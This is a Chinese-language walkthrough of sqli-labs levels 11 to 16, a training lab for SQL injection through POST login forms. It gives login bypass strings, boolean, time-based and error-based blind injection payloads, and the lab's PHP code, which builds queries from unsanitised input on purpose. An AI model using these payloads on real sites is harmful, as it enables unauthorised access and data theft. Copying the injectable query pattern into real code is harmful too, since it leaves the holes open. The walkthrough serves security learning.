文章目录
11.Less-11-Error Based
11.1、报错尝试
如下图,以下试错语句。
admin’ 【单引号,报错】
admin’ %23 【单引号+注释,正常】
如下图,在username中输入 admin' #
,密码随便输入,如下图,页面正常显示。
这一关类似于第一关,只是将get型改为了post型。
11.2、代码分析
// connectivity
@$sql="SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row)
{
//echo '<font color= "#0000ff">';
echo "<br>";
echo '<font color= "#FFFF00" font size = 4>';
//echo " You Have successfully logged in\n\n " ;
echo '<font size="3" color="#0000ff">';
echo "<br>";
echo 'Your Login name:'. $row['username'];
echo "<br>";
echo 'Your Password:' .$row['password'];
echo "<br>";
echo "</font>";
echo "<br>";
echo "<br>";
echo '<img src="../images/flag.jpg" />';
echo "</font>";
}
else
{
echo '<font color= "#0000ff" font size="3">';
//echo "Try again looser";
print_r(mysql_error());
echo "</br>";
echo "</br>";
echo "</br>";
echo '<img src="../images/slap.jpg" />';
echo "</font>";
}
12.Less12-Error-based-Double quotes
12.1、报错测试
输入 admin " 【双引号,产生如下报错,即可能含有括号】
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘“admin”") and password=("") LIMIT 0,1’ at line 1
admin" # 【双引号+注释,报错】
admin") # 【双引号+括号,正常】
通过上面可以发现,此关的闭合方式为“双引号+括号”闭合,其余的注入方式和上一关一样均类似于第一关的注入方式,只是将第一关的单引号变为了双引号。
PS:在这里的注释符号直接写#,不需要写%23,因为网页不会自动解析。
12.2、代码分析
// connectivity
$uname='"'.$uname.'"';
$passwd='"'.$passwd.'"';
@$sql="SELECT username, password FROM users WHERE username=($uname) and password=($passwd) LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row)
{
//echo '<font color= "#0000ff">';
echo "<br>";
echo '<font color= "#FFFF00" font size = 4>';
//echo " You Have successfully logged in " ;
echo '<font size="3" color="#0000ff">';
echo "<br>";
echo 'Your Login name:'. $row['username'];
echo "<br>";
echo 'Your Password:' .$row['password'];
echo "<br>";
echo "</font>";
echo "<br>";
echo "<br>";
echo '<img src="../images/flag.jpg" />';
echo "</font>";
}
else
{
echo '<font color= "#0000ff" font size="3">';
//echo "Try again looser";
print_r(mysql_error());
echo "</br>";
echo "</br>";
echo "</br>";
echo '<img src="../images/slap.jpg" />';
echo "</font>";
}
13.Less13-Double Injection-String-with twist
13.1、报错测试
admin’ 【单引号,产生如下报错】
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘’’’) and password=(’’) LIMIT 0,1’ at line 1
admin’) # 【单引号+括号+注释,正常显示】
通过上面可以判断这一关的闭合方式为“单引号+括号”,并且可以发现,这里会显示你是否成功以及输入的语句是否合法,但是并不会显示数据库中的账号信息之类的,类似于盲注了。
可以尝试着用一下布尔型盲注,请参考第五关。由于这里能够回显数据库的报错提示,可以利用报错注入进行信息查找。
猜测数据库第一位:
admin') and left(database(),1)>'a' #
如下,显示成功登陆。之后的payload参见第五关。
13.2、代码分析
// connectivity
@$sql="SELECT username, password FROM users WHERE username=('$uname') and password=('$passwd') LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row)
{
//echo '<font color= "#0000ff">';
echo "<br>";
echo '<font color= "#FFFF00" font size = 4>';
//echo " You Have successfully logged in " ;
echo '<font size="3" color="#0000ff">';
echo "<br>";
//echo 'Your Login name:'. $row['username'];
//echo "<br>";
//echo 'Your Password:' .$row['password'];
//echo "<br>";
echo "</font>";
echo "<br>";
echo "<br>";
echo '<img src="../images/flag.jpg" />';
echo "</font>";
}
else
{
echo '<font color= "#0000ff" font size="3">';
//echo "Try again looser";
print_r(mysql_error());
echo "</br>";
echo "</br>";
echo "</br>";
echo '<img src="../images/slap.jpg" />';
echo "</font>";
}
14.Less14-Double Injection-Double quotes
14.1、报错尝试
输入以下语句
admin’ 【单引号,非正常】
admin’ # 【单引号+注释,非正常】
admin" 【双引号,报错,显示如下】
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘“admin”" and password="" LIMIT 0,1’ at line 1amdin"# 【双引号+注释,成功显示,成功显示界面如下:】
尝试盲注获取数据库信息。
获取数据库的第一个字母信息。在username中输入:
admin" and left(database(),1)>'a' #
由于回显数据库的错误信息,因此利用报错注入。如下,在username框中输入如下语句。
admin" union select 1,exp(~(select*from(select user())x))
页面显示如下:
14.2、代码分析
// connectivity
$uname='"'.$uname.'"';
$passwd='"'.$passwd.'"';
@$sql="SELECT username, password FROM users WHERE username=$uname and password=$passwd LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row)
{
//echo '<font color= "#0000ff">';
echo "<br>";
echo '<font color= "#FFFF00" font size = 4>';
//echo " You Have successfully logged in " ;
echo '<font size="3" color="#0000ff">';
echo "<br>";
//echo 'Your Login name:'. $row['username'];
//echo "<br>";
//echo 'Your Password:' .$row['password'];
//echo "<br>";
echo "</font>";
echo "<br>";
echo "<br>";
echo '<img src="../images/flag.jpg" />';
echo "</font>";
}
else
{
echo '<font color= "#0000ff" font size="3">';
//echo "Try again looser";
print_r(mysql_error());
echo "</br>";
echo "</br>";
echo "</br>";
echo '<img src="../images/slap.jpg" />';
echo "</font>";
}
15.Less15-Blind-Boolean Based
15.1、报错尝试
输入以下语句,不断进行试错:
admin’ 【单引号,无显示】
admin’# 【单引号+注释,正常显示】
admin" 【双引号,无显示】
admin"# 【双引号+注释,无显示】
从上面可以大致判断本关的闭合方式为单引号闭合,并且是盲注,不回显数据库的报错信息,因此我们需要进行延时注入。
猜测数据库的第一位:
当页面显示语句正确的时候,页面将会正常显示,当语句不正确的时候,将会执行sleep(5)语句,即页面将会加载5秒。
admin' and if(ascii(substr(database(),1,1))=115,1,sleep(5))#
15.2、代码分析
@$sql="SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row)
{
//echo '<font color= "#0000ff">';
echo "<br>";
echo '<font color= "#FFFF00" font size = 4>';
//echo " You Have successfully logged in\n\n " ;
echo '<font size="3" color="#0000ff">';
echo "<br>";
//echo 'Your Login name:'. $row['username'];
echo "<br>";
//echo 'Your Password:' .$row['password'];
echo "<br>";
echo "</font>";
echo "<br>";
echo "<br>";
echo '<img src="../images/flag.jpg" />';
echo "</font>";
}
else
{
echo '<font color= "#0000ff" font size="3">';
//echo "Try again looser";
//print_r(mysql_error());
echo "</br>";
echo "</br>";
echo "</br>";
echo '<img src="../images/slap.jpg" />';
echo "</font>";
}
16.Less16-Blind-Time Based-Double quotes
16.1、报错尝试
在页面输入以下语句:
admin’ 【单引号,无显示】
admin" 【双引号,无显示】
admin’ # 【单引号+注释,无显示】
admin " # 【双引号+注释,无显示】
admin ’ ) # 【单引号+括号+注释,无显示】
admin " ) # 【双引号+括号+注释,正常显示】
从上面,我们可以猜测该页面闭合方式为“双引号+括号”闭合,不回显数据库错误信息,因此属于盲注,需要用到延时注入,处理方法类似于Less15.
猜测数据库第一个字符的paylaod,其余的请读者自行构造。
admin") and if(ascii(substr(database(),1,1))=115,1,sleep(5))#
16.2、代码分析
// connectivity
$uname='"'.$uname.'"';
$passwd='"'.$passwd.'"';
@$sql="SELECT username, password FROM users WHERE username=($uname) and password=($passwd) LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row)
{
//echo '<font color= "#0000ff">';
echo "<br>";
echo '<font color= "#FFFF00" font size = 4>';
//echo " You Have successfully logged in " ;
echo '<font size="3" color="#0000ff">';
echo "<br>";
//echo 'Your Login name:'. $row['username'];
echo "<br>";
//echo 'Your Password:' .$row['password'];
echo "<br>";
echo "</font>";
echo "<br>";
echo "<br>";
echo '<img src="../images/flag.jpg" />';
echo "</font>";
}
else
{
echo '<font color= "#0000ff" font size="3">';
echo "</br>";
echo "</br>";
//echo "Try again looser";
//print_r(mysql_error());
echo "</br>";
echo "</br>";
echo "</br>";
echo '<img src="../images/slap.jpg" />';
echo "</font>";
}